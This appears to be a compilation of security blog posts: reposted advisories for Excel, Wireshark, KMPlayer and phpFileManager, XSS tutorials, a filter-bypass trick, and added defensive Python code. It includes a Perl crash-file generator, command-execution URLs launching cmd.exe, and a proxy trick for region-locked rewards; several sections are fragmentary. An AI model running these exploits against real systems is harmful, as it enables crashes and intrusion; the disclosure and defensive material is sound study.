Microsoft Office Excel 2007, 2010, 2013 - BIFFRecord Use-After-Free Demo By Noah J Franklin





# Author :  Google Security Research 
# CVE-2015-2523

The following crash was observed in Microsoft Excel 2007 running on Windows 2003 R2. This crash was also reproduced in Microsoft Excel 2010 on Windows 7 x86 and Microsoft Excel 2013 on Windows 8.1 x86. The test environment was Excel 2007 on Windows 2003 R2 with Application Verifier basic checks enabled.
Attached files:
Original File: 683709058_orig.xls
Crashing File: 683709058_crash.xls
Minimized Crashing File: 683709058_min.xls
The minimized crashing file shows two deltas from the original. The first at offset 0x237 is in the data of the 4th BIFFRecord and the second delta at offset 0x34a5 is in the type field of a BIFFRecord.
File versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
eax=00000000 ebx=00000000 ecx=0ce119f8 edx=00003fff esi=0e98de10 edi=0013c82c
eip=30037cc5 esp=00137180 ebp=00137188 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Excel.exe -
Excel!Ordinal40+0x37cc5:
30037cc5 0fb64604        movzx   eax,byte ptr [esi+4]       ds:0023:0e98de14=??
0:000> kb L8
ChildEBP RetAddr  Args to Child             
WARNING: Stack unwind information not available. Following frames may be wrong.
00137188 303df098 0e98de10 00000000 00000102 Excel!Ordinal40+0x37cc5
0013d068 30528190 0013d0a8 00000102 00000000 Excel!Ordinal40+0x3df098
0013d2bc 305280b1 00000000 00000001 00000008 Excel!Ordinal40+0x528190
0013d330 3038d46d 0013ddf2 00000000 00000001 Excel!Ordinal40+0x5280b1
0013e000 300084a4 0013e104 00000001 0013f568 Excel!Ordinal40+0x38d46d
0013fbb0 30005e9a 02270fd7 00000003 30f61708 Excel!Ordinal40+0x84a4
0013feb8 30003b3a 00000000 02270fd7 00000003 Excel!Ordinal40+0x5e9a
0013ff30 30003884 30000000 00000000 02270fd7 Excel!Ordinal40+0x3b3a
In this crash esi is a heap address. We can see that this is a free chunk:
0:000> !heap -p -a 0xe98de10
    address 0e98de10 found in
    _DPH_HEAP_ROOT @ 1161000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    e7f0fc0:          e98d000             2000
    7c83e330 ntdll!RtlFreeHeap+0x0000011a
    018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8
    331039d5 mso!Ordinal1743+0x00002d4d
    329c91d1 mso!MsoFreePv+0x0000003f
    30298310 Excel!Ordinal40+0x00298310
    30300ac3 Excel!Ordinal40+0x00300ac3
    305f1899 Excel!Ordinal40+0x005f1899
This is a use after free vulnerability affecting all currently supported versions of Microsoft Excel.
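The triage step that the report describes (minimizing the crashing file down to two byte deltas and then asking which BIFFRecord, and which field of it, each delta lands in) can be reproduced with a small record walker. The following is an added example, not code from the Google Security Research report or from Excel: it parses the flat [type:u16][length:u16][data] record layout, maps a byte offset to the record ordinal and field it falls in, and refuses to trust a length field that runs past the buffer, which is the kind of check a parser needs so that a fuzzed length cannot drive an out-of-bounds read. The record ids are real BIFF8 values; the byte stream and the offsets probed are constructed for the example, and for a real .xls the Workbook stream is assumed to have been extracted from the OLE2 container first. The use-after-free itself is not modelled here.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

# Layout of every BIFF record: [type:u16 LE][length:u16 LE][data:length bytes]
BIFF_HEADER = struct.Struct("<HH")
HEADER_LEN = BIFF_HEADER.size  # 4

# Real BIFF8 record ids used by the constructed sample stream below
BOF, EOF, INTERFACEHDR, MMS, CODEPAGE, WINDOW1 = 0x0809, 0x000A, 0x00E1, 0x00C1, 0x0042, 0x003D


@dataclass
class BiffRecord:
    index: int    # 0-based position in the stream
    offset: int   # offset of the 4-byte header within the buffer
    rtype: int
    length: int
    data: bytes


def walk_biff(stream: bytes, start: int = 0) -> List[BiffRecord]:
    """Parse consecutive BIFF records beginning at `start`.

    The declared length is checked against the buffer before it is used, so a
    fuzzed length field produces a ValueError instead of an out-of-bounds read.
    """
    records: List[BiffRecord] = []
    pos = start
    while pos + HEADER_LEN <= len(stream):
        rtype, length = BIFF_HEADER.unpack_from(stream, pos)
        data_start = pos + HEADER_LEN
        if data_start + length > len(stream):
            raise ValueError(
                f"record {len(records)} at 0x{pos:x} declares length {length}, "
                f"which runs past the end of the stream")
        records.append(BiffRecord(len(records), pos, rtype, length,
                                  stream[data_start:data_start + length]))
        pos = data_start + length
        if rtype == EOF:  # EOF closes the substream; stop here
            break
    return records


def locate_offset(records: List[BiffRecord], offset: int) -> Optional[dict]:
    """Report which record, and which field of it, a byte offset falls in."""
    for r in records:
        if r.offset <= offset < r.offset + HEADER_LEN + r.length:
            rel = offset - r.offset
            field = "type" if rel < 2 else "length" if rel < 4 else "data"
            return {"index": r.index, "ordinal": r.index + 1, "type": r.rtype,
                    "field": field,
                    "data_offset": rel - HEADER_LEN if field == "data" else None}
    return None


def truncation_detected(stream: bytes) -> bool:
    """True when walk_biff rejects the stream because a length field overruns it."""
    try:
        walk_biff(stream)
        return False
    except ValueError:
        return True


def rec(rtype: int, data: bytes) -> bytes:
    return BIFF_HEADER.pack(rtype, len(data)) + data


# Constructed sample stream: BOF, INTERFACEHDR, MMS, CODEPAGE, WINDOW1, EOF.
SAMPLE_STREAM = (
    rec(BOF, b"\x00\x06\x05\x00" + b"\x00" * 12)   # BIFF8 workbook-globals BOF, 16 data bytes
    + rec(INTERFACEHDR, b"\xb0\x04")
    + rec(MMS, b"\x00\x00")
    + rec(CODEPAGE, b"\xb0\x04")                    # 4th record, 2 data bytes at offsets 36..37
    + rec(WINDOW1, b"\x00" * 18)
    + rec(EOF, b"")
)


def locate_in_sample(offset: int) -> Optional[dict]:
    return locate_offset(walk_biff(SAMPLE_STREAM), offset)


if __name__ == "__main__":
    for r in walk_biff(SAMPLE_STREAM):
        print(f"#{r.index + 1} @0x{r.offset:04x} type=0x{r.rtype:04x} len={r.length}")
    print(locate_in_sample(37))   # a byte inside the data of the 4th record
    print(locate_in_sample(38))   # the type field of the 5th record
```

For a real minimized file, call walk_biff with the file bytes and the offset at which the Workbook stream begins, then pass each delta offset to locate_offset; the result tells you whether the mutation changed a record's type, its length, or its payload, which is the first thing to know before looking at how the parser frees and reuses the record.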
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38214.zip






Wireshark 1.12.7 - Crash PoC

 

 



# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
# Date: 02/09/2015
# Exploit Author: SwanBeaujard
# Exploit Demo: Noah Franklin J
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7
# Tested on: Windows 7
# Visit : www.noahfranklin.blogpost.com

 




 

One More XSS on Urbanpro.com





I found XSS and HTML injection on the UrbanPro site long back and reported it to them. Before, it was named ThinkVidya.






123Contact - XSS and Html Injection- Hall of Fame





# Application   : 123ContactForm website (http://www.123contactform.com)
# Author        : Noah Franklin J - Security Researcher
# Date          : Jul 31 2015
# OS            : Windows
# Tested on     : Win 7
# Type of vulnerability: HTML Injection & Cross Site Scripting
# Greetz to     : Noah Franklin J
# Use for educational purposes only.
# Note: you are not allowed to edit/modify
# if you do, we cannot be held responsible for any damages this may cause.
# Report Sent   : Jul 31 2015
# Response from 123Contactform Support Team : Aug 4 2015
# Disclosed 123Contactform Support Team     : Aug 4 2015
# Hall of Fame on Aug 12 2015



POC 









Google Translator Helps To Access Blocked Site-Is it Really India Government has banned 857 porn sites ??




After reading lots of news pages I came to know that the Indian Govt banned porn sites:
The Department of Telecom is to notify internet service providers to block access to 857 URLs, under the provision of Section 79(3)(b) of the Information Technology Act, 2000, as the content hosted on these websites relates to morality and decency as given in Article 19(2) of the Constitution of India.


Those words, "block access", made me think: why didn't they ban the porn sites?

What if anyone used a proxy or any other tool to bypass this?

My old trick, which I used in my college days, is still effective: Google Translator can help unblock all the sites because it runs over the HTTPS protocol and it is a product of Google. The Indian Govt can't ban all HTTPS connections like Google, Gmail and Facebook, including Google Translator.


I request the Indian Govt people to check this bypassing method and block it properly. The list of blocked sites is below:

http://thelogicalindian.com/news/the-complete-list-of-857-porn-websites-blocked-in-india-and-the-governments-clarification/

POC to unblock the website:

Blocked, not banned.








KMPlayer 3.9.x - .srt Crash PoC

 


 


Kmplayer

K-Multimedia Player (commonly known as The KMPlayer, KMPlayer or KMP) is a media player for Windows which can play a large number of formats including VCD, DVD, AVI, MKV, Ogg, OGM, 3GP, MPEG-1/2/4, WMV, RealMedia, FLV and QuickTime. It has a significant user base and has received strong ratings and reviews on major independent download sites. (Source: Wikipedia)

 

###################################################################
#!/usr/bin/perl -w
# Title : KMPlayer 3.9.x - Crash Proof Of Concept
# Company : http://www.kmplayer.com
# Tested : Windows 7 / Windows 8.1
#
# Author      :   Peyman Motevalli Manesh
# Demo Tut    :   Noah Franklin J
# facebook.com/noahjfranklin || www.noahfranklin.blogspot.com
##################################################################
# 1 . run perl code : perl km.pl
# 2 . open "kmplayer"
# 3 . Load Subtitle (Peyman.srt)
# 4 . Crashed
##################################################################
use strict;
use warnings;

# Trailer bytes appended after the oversized payload
my $eheader = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x14";
# 9850 'B' bytes followed by 500000 'A' bytes: one enormous subtitle text line
my $h   = "\x42" x 9850;
my $poc = "\x41" x 500000;
$poc = "$h$poc$eheader";

# Write four cues, each with an index line, a timing line and the oversized text
open(my $fh, '>', 'Peyman.srt') or die "Cannot open Peyman.srt: $!";
for my $i (1 .. 4) {
    print $fh "$i\n00:00:01,800 --> 00:00:05,500\n";
    print $fh $poc;
}
close($fh) or die "Cannot close Peyman.srt: $!";
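As a defensive counterpart to the generator above, here is an added example (not code from KMPlayer or from the PoC author) of an .srt reader that enforces an upper bound on the size of each cue's text, so a file shaped like the one the script writes is rejected and reported instead of being handed to a fixed-size buffer. The MAX_CUE_TEXT limit is an assumed value, and both sample subtitle inputs are constructed; the oversized one mirrors the PoC's layout (index line, timing line, one huge text line) at a much smaller size.

```python
import re
from typing import List, Optional, Tuple

# Assumed limit on the text of one cue, in bytes; a real player would pick its own bound.
MAX_CUE_TEXT = 4096

TIMING_RE = re.compile(
    rb"^(\d\d):(\d\d):(\d\d),(\d{3}) --> (\d\d):(\d\d):(\d\d),(\d{3})\s*$")


def _to_ms(h: bytes, m: bytes, s: bytes, ms: bytes) -> int:
    return (int(h) * 3600 + int(m) * 60 + int(s)) * 1000 + int(ms)


def parse_srt(data: bytes, max_text: int = MAX_CUE_TEXT) -> Tuple[List[dict], List[Optional[int]]]:
    """Parse SRT cues from raw bytes.

    Returns (cues, rejected): `cues` holds well-formed cues whose text fits in
    `max_text` bytes; `rejected` lists the indexes of cues dropped for exceeding it.
    Blocks are separated by blank lines; a block is an index line, a timing line,
    then text lines. A missing or malformed timing line raises ValueError.
    """
    cues: List[dict] = []
    rejected: List[Optional[int]] = []
    lines = data.replace(b"\r\n", b"\n").split(b"\n")
    i, n = 0, len(lines)
    while i < n:
        if not lines[i].strip():
            i += 1
            continue
        idx_line = lines[i].strip()
        i += 1
        m = TIMING_RE.match(lines[i]) if i < n else None
        if m is None:
            raise ValueError(f"expected a timing line after cue index {idx_line!r}")
        i += 1
        text_lines = []
        while i < n and lines[i].strip():
            text_lines.append(lines[i])
            i += 1
        text = b"\n".join(text_lines)
        index = int(idx_line) if idx_line.isdigit() else None
        if len(text) > max_text:
            rejected.append(index)  # drop the cue but keep parsing the rest of the file
            continue
        cues.append({
            "index": index,
            "start_ms": _to_ms(*m.groups()[:4]),
            "end_ms": _to_ms(*m.groups()[4:]),
            "text": text,
        })
    return cues, rejected


# Constructed well-formed subtitle with two cues
NORMAL_SRT = (
    b"1\n00:00:01,800 --> 00:00:05,500\nHello there\n\n"
    b"2\n00:00:06,000 --> 00:00:08,250\nSecond line\nstill cue 2\n"
)

# Constructed file shaped like the PoC output: one cue whose text is far over the bound
OVERSIZED_SRT = b"1\n00:00:01,800 --> 00:00:05,500\n" + b"A" * 10_000 + b"\n"


if __name__ == "__main__":
    print(parse_srt(NORMAL_SRT))
    print(parse_srt(OVERSIZED_SRT))
```

Because the PoC never writes a blank line between cues, everything after the first timing line is one text block to this parser, which is exactly why a size check on the block (rather than only on the number of cues) is the useful control here.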
 




 


phpFileManager 0.9.8 Remote Command Execution













Description:


phpFileManager is a complete filesystem management tool on a single file. Features: server info, directory tree, copy/move/delete/create/rename/edit/view/chmod files and folders, tar/zip/bzip/gzip, multiple uploads, shell/exec, works on linux/windows




Features


  • server info
  • directory tree
  • copy/move/delete/create/rename/edit/view/chmod files and folders
  • tar/zip/bzip/gzip
  • multiple uploads
  • shell/exec
  • works on linux/windows

Exploits 

phpFileManager is vulnerable to remote command execution: it runs operating system commands passed in GET requests, so those commands can be issued from a victim's browser by getting the victim to click a malicious link or visit a malicious website.

Exploit code(s):
===============


Remote Command Execution:
-------------------------

1- call Windows cmd.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe


2- Run Windows calc.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe
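Since the requests above are plain GETs, they leave a clear trace in the web server's access log. The following is an added example, not part of the advisory or of phpFileManager, of detection logic that scans combined-format access log lines for requests to index.php carrying action=6 together with a cmd parameter, decodes the command, and marks requests whose Referer points at a host outside an assumed trusted set (the sign that the request was initiated from a third-party page, as the description above says). The log lines and the TRUSTED_REFERER_HOSTS set are constructed for the example.

```python
import re
from typing import List
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Hosts that may legitimately link to the file manager (assumed for the example);
# a Referer on any other host means the request came from a third-party page.
TRUSTED_REFERER_HOSTS = {"localhost", "127.0.0.1"}


def find_shell_requests(log_text: str) -> List[dict]:
    """Flag requests to index.php with action=6 and a cmd parameter, the shape
    of the command-execution requests shown in the advisory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/index.php"):
            continue
        q = parse_qs(url.query, keep_blank_values=True)
        if q.get("action") != ["6"] or "cmd" not in q:
            continue
        referer = m["referer"]
        referer_host = urlsplit(referer).hostname if referer != "-" else None
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "cmd": q["cmd"][0],            # percent-decoded by parse_qs
            "status": int(m["status"]),
            "referer": referer,
            "cross_site": referer_host is not None and referer_host not in TRUSTED_REFERER_HOSTS,
        })
    return hits


# Constructed sample log: a cross-site-initiated shell request, a benign directory
# listing, and a direct shell request with no Referer.
SAMPLE_LOG = r'''
192.0.2.10 - - [28/Jul/2015:10:12:01 +0000] "GET /phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe HTTP/1.1" 200 512 "http://lure.example/page.html" "Mozilla/5.0"
192.0.2.11 - - [28/Jul/2015:10:12:05 +0000] "GET /phpFileManager-0.9.8/index.php?action=1&current_dir=C:/xampp/htdocs/ HTTP/1.1" 200 2048 "http://localhost/phpFileManager-0.9.8/index.php" "Mozilla/5.0"
192.0.2.12 - - [28/Jul/2015:10:13:40 +0000] "GET /phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe HTTP/1.1" 200 77 "-" "curl/7.43"
'''


if __name__ == "__main__":
    for hit in find_shell_requests(SAMPLE_LOG):
        print(hit)
```

The action number and parameter name are taken from the URLs in the advisory; if the installation path differs, only the path check needs adjusting, and a status of 200 on such a request is worth treating as a confirmed execution rather than an attempt.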

 


Source from : 
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt
 


 
 
 


 

 

PHP File Manager – Multiple Critical Security Vulnerabilities ( Including Backdoor! )

 


According to Sijmen Ruwhof ( https://twitter.com/sruwhof ) , a security consultant and penetration tester based in the Netherlands, some of the issues have been present in the software for the last five years. After three failed attempts to get in touch with Revived Wire Media, the Virginia-based company behind the product, Ruwhof opted on Monday to disclose the issues publicly – See more at: http://seclists.org/fulldisclosure/2015/Jul/117


Hit Login Button


“Password hashes stored in the user database are unsalted and are generated via the deprecated MD5 hash algorithm,” Ruwhof said. He explained that an attacker could revert the hashes to their original passwords using an online MD5 reversing service.

The file manager also has a weak password strength policy, a lack of variation in default passwords and measures that don’t force the user to change default passwords. Other flaws include an unsecured backdoor, the ability for users to upload arbitrary and unauthenticated files, and no configuration to restrict file extensions.
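To show why Ruwhof's point about unsalted MD5 matters, here is an added example (not code from PHP File Manager or from Ruwhof's write-up) that contrasts unsalted MD5 with a salted, slow PBKDF2-HMAC-SHA256 scheme. With no salt, one hash per candidate word is matched against every user at once and two users who chose the same password share a hash, which is what makes a precomputed lookup effective; with a per-user salt the same password yields different stored values and each guess costs a full key derivation. The user table, passwords and wordlist are constructed, and the iteration count is an assumed work factor.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional


def md5_hex(password: str) -> str:
    """Unsalted MD5, the storage scheme the advisory criticises."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def crack_unsalted_md5(stored: Dict[str, str], wordlist: List[str]) -> Dict[str, str]:
    """Reverse unsalted hashes with a precomputed table: each word is hashed once
    and compared against every stored hash, regardless of how many users there are."""
    table = {md5_hex(word): word for word in wordlist}
    return {user: table[h] for user, h in stored.items() if h in table}


# Hardened scheme: per-user random salt plus PBKDF2-HMAC-SHA256 with a high work factor
PBKDF2_ITERATIONS = 600_000  # assumed work factor


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


# Constructed user table: alice and bob picked the same weak password, carol did not.
USERS_MD5 = {
    "alice": md5_hex("password123"),
    "bob": md5_hex("password123"),
    "carol": md5_hex("correct horse battery staple 7!"),
}
WORDLIST = ["letmein", "qwerty", "password123", "admin"]


def demo_cracked() -> Dict[str, str]:
    """Users whose unsalted MD5 hash appears in the wordlist table."""
    return crack_unsalted_md5(USERS_MD5, WORDLIST)


def demo_salted_hashes_differ() -> bool:
    """Same password hashed twice with fresh salts gives two different stored values."""
    return hash_password("password123") != hash_password("password123")


if __name__ == "__main__":
    print("recovered from unsalted MD5:", demo_cracked())
    print("salted hashes differ for the same password:", demo_salted_hashes_differ())
```

The stored string carries the algorithm, iteration count and salt alongside the derived key, so the work factor can be raised later and old entries re-hashed on the user's next successful login.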

Source : http://sijmen.ruwhof.net/weblog/411-multiple-critical-security-vulnerabilities-including-a-backdoor-in-php-file-manager

How to Get Free Credits for Skype - Skype to Mobile Free - TUT



Free Credits for Skype  - Skype to mobile Calls free



Step 1 : Create a Microsoft account (Hotmail, Live, Outlook); I already have one.
Step 2 : Log in to www.bing.com/rewards/dashboard
Step 3 : You may see the error "Bing Rewards isn't available yet in your country or region"
Step 4 : Use the Hola proxy plugin for Chrome, change the location to USA and reload Bing
Step 5 : Start searching in Bing: 3 searches give 1 credit; once you reach 100 you can redeem 100 credits and use them for Skype
Step 6 : The credits will be sent to your email; copy the Skype code and paste it on



Step 7 : http://www.skype.com/voucher
Step 8 : Check your Skype balance









 

Step 9 : Feedback to fb.com/noahjfranklin and twitter.com/franklinnoahj :P





Cross Site Scripting - II




Persistent XSS Attack

In a persistent attack, the code injected by the attacker is stored on the server side (usually in a database) and served to every user who views the affected page. The damage caused by a persistent attack is greater than that of a non-persistent attack. Here we will see how to hijack another user's session by performing XSS.

Session

HTTP is a stateless protocol, which means it does not maintain any state between one request/response pair and the next: all requests and responses are independent of each other. But most web applications do not want this. Once the user has authenticated, the web server should not ask for the username/password again on the user's next request. To do this, the application needs to maintain some kind of state between the web browser and the web server, which is done through "Sessions".

Cross Site Scripting - I








What is Cross Site Scripting ?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications (or in web browsers, through breaches of browser security) that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

Types of Cross Site Scripting

XSS attacks are broadly classified into 3 types:

•    Non-Persistent (Reflected Attack)
•    Persistent (Stored Attack)
•    DOM-Based XSS

Non-Persistent XSS Attack


In a non-persistent attack, the user must visit a link specially crafted by the attacker. When the user visits the link, the crafted code is executed by the user's browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS



When the victim loads the above URL into the browser, he will see an alert box which says
. Even though this example doesn't do any damage other than the annoying pop-up, you can see how an attacker can use this method to do several damaging things.

Again using DVWA on localhost, performing an XSS reflection attack




Enter any name and submit, then check the response of the website.
 




For example, I used my name, Noah Franklin; see the response of the website: it says Hello Noah Franklin.






The alert() method displays an alert box with a specified message and an OK button; use the script shown below.
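The two posts above come down to two server-side controls, shown together in one added example that is not code from DVWA or from the author: output encoding keeps the reflected "Hello <name>" page from executing whatever was typed into the name field (the reflected case described in Cross Site Scripting - I), and marking the session cookie HttpOnly keeps a script that does get injected from reading the session id that a persistent XSS would otherwise steal (the session-hijacking case described in Cross Site Scripting - II). The PHPSESSID cookie name, the rendering functions and the sample inputs are assumed and constructed for the example.

```python
import html
import secrets
from http.cookies import SimpleCookie
from typing import Optional

# Constructed request parameter values
NAME_OK = "Noah Franklin"
NAME_XSS = "<script>alert('xss')</script>"


def render_greeting_vulnerable(name: str) -> str:
    """Echoes the parameter verbatim, the behaviour of the low-security DVWA reflected-XSS page."""
    return f"<pre>Hello {name}</pre>"


def render_greeting_safe(name: str) -> str:
    """Encodes < > & \" ' as entities so the browser renders the input as text, not markup."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


def contains_script_tag(markup: str) -> bool:
    """Crude check used here only to show whether injected markup survived into the response."""
    return "<script" in markup.lower()


def session_cookie_header(session_id: Optional[str] = None) -> str:
    """Build the Set-Cookie value for a session id.

    HttpOnly removes the cookie from document.cookie, so injected script cannot read it;
    Secure keeps it off plaintext HTTP; SameSite=Lax limits cross-site sending.
    """
    sid = session_id or secrets.token_urlsafe(32)
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = sid
    morsel = cookie["PHPSESSID"]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Lax"
    morsel["path"] = "/"
    return morsel.OutputString()


if __name__ == "__main__":
    print(render_greeting_vulnerable(NAME_XSS))
    print(render_greeting_safe(NAME_XSS))
    print("Set-Cookie:", session_cookie_header())
```

HttpOnly does not stop the injected script from acting within the page on the user's behalf, so it narrows the damage of a session-stealing payload rather than replacing the output encoding; both controls belong together.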